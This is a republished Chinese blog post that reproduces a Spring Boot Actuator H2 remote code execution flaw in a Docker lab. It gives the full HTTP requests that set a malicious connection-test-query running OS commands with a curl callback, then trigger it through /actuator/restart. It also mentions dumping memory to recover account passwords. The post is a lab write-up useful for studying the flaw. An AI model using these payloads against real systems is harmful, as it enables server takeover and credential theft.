Spring Boot Actuator H2 RCE复现-解决篇

开心分享

发布于 2020-08-10 09:59:40

2.6K0

发布于 2020-08-10 09:59:40

文章被收录于专栏：开心分享-技术交流

原文：Spring Boot Actuator H2 RCE复现

前端时间碰到一个Actuator 信息泄露的然后复现了一下这个漏洞

git clone https://github.com/spaceraccoon/spring-boot-actuator-h2-rce.git

(2) 使用docker启动环境

先cd进入spring-boot-actuator-h2-rce目录然后执行以下命令

docker build -t spaceraccoon/spring-boot-rce-lab .
docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab

(3) 访问:http://39.105.93.185:8080/actuator

0x02 漏洞复现

（1）发送如下POST包配置spring.datasource.hikari.connection-test-query的值

POST /actuator/env HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 389
{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl 39.105.93.185:8081');"}

（2）查看/actuator/env

（3）向端点 /actuator/restart 发送POST请求，重启应用

POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 356
{}

(4) 查看nc

PS ：有些机器不出网的时候可以利用dump 获取信息然后使用软件导出账号密码如下：

软件地址：云盘下载

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2020年8月7日，如有侵权请联系 cloudcommunity@tencent.com 删除

网络安全

安全

spring

http

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度

Spring Boot Actuator H2 RCE复现-解决篇

Spring Boot Actuator H2 RCE复现-解决篇

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐